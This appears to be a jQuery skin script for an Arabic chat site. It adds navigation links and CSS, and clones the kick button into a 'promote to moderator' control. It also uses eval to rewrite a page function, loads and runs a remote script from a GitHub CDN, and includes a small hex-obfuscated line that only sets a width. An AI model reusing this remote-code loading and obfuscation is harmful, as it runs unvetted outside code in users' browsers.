$(`<img src="/sico/z1e8gf0c0610.png" class="fr" style="width:100%;margin-top: 0px;" >
<a id="des22" style="width:95px;float:right;margin:-68px 2px 2px;color: #ffffff;transform:matrix(1, 0, 0, 1, 3, 42);background-color: #A17082!important;" class="label label label-primary mini fl" target="_blank" href="mobile.html"> التطبيق </a>
<a id="des22" style="width:95px;margin:-68px 2px 2px;float:right;color: #ffffff;transform:matrix(1, 0, 0, 1, 3, 15);background-color: #A17082!important;" class="label label label-primary mini fl" target="_blank" href="sub.html">الأشتراكات</a>
<a id="des22" style="width:90px;margin:2px;transform:matrix(1, 0, 0, 1, 6, 0);background-color: #A17082!important;" class="label label label-primary mini fl" target="_blank" href="https://www.al3nood.net/"> شات العنود </a>
<a id="des22" style="width:90px;margin:2px;transform:matrix(1, 0, 0, 1, 2, 0);background-color: #A17082!important;" class="label label label-primary mini fl" target="_blank" href="https://mskchat.com/">شات الجوال</a>
<a id="des22" style="width:92px;margin:2px;transform:matrix(1, 0, 0, 1, -2, 0);background-color: #A17082!important;" class="label label label-primary mini fl" target="_blank" href="contact.html"> اتصل بنا </a>
<a id="des22" style="color: #ffffff;width:97px;margin:2px;transform:matrix(1, 0, 0, 1, 8, 0);background-color: #A17082!important;" class="label label label-primary mini fl" target="_blank" href="rules.html">القوانين</a>
`).insertBefore('.nav-tabs');
eval((close+'').replace('location.reload()','location.href="/"'));
$(`<link rel="stylesheet" type="text/css" href=""><style>.des {position: absolute;transform:matrix(1, 0, 0, 1, 85, -157);margin-top: 2px;width: 300px;height: 25px;float: left;background: transparent url(https://mskchat.com/sico/z1e8oqk6pf10.png) no-repeat scroll right top;text-align: left;}button.btn.fr.btn-success.fa.fa-refresh {display: none;}a.label.label-primary.fl img.fl {display: none;}a.label.label-primary.fl {border-radius: 3px!important;margin: 2px -156px;padding: 5px!important;margin-bottom: 2px;text-align: right!important;}#des22 {text-align: center!important;font-size: 100%!important;}label.fl.label.loginstat {background-color: transparent!important;position: absolute;top: 0;margin-top: 4px;left: 0;}.fr.borderg, .fr.borderg a {font-size: 10px !important;padding: 0 5px!important;}span.s1.fa.fa-user.label.badgex.label-as-badge.label-success {padding: 0px 3px 2px;margin-right: 5px;}label.label.label-primary.mini.fl {width: 64%!important;padding: 1px;border-radius: 3px!important;}</style>`).insertBefore('body');$($(".urkick")[0].outerHTML.replace('user-times','star').replace('urkick','umod').replace('darkorchid','green')).text('ترقيه الى مراقب').insertAfter('.urkick');$(".nonot").remove();
$.getScript("https://cdn.statically.io/gh/a7mdal3le/7ob/29bcf363/msk5.js");
var _0x3d29=["\x77\x69\x64\x74\x68","\x30\x70\x78","\x63\x73\x73","\x2E\x66\x6C\x2E\x75\x73\x74\x61\x74"];$(_0x3d29[3])[_0x3d29[2]](_0x3d29[0],_0x3d29[1])
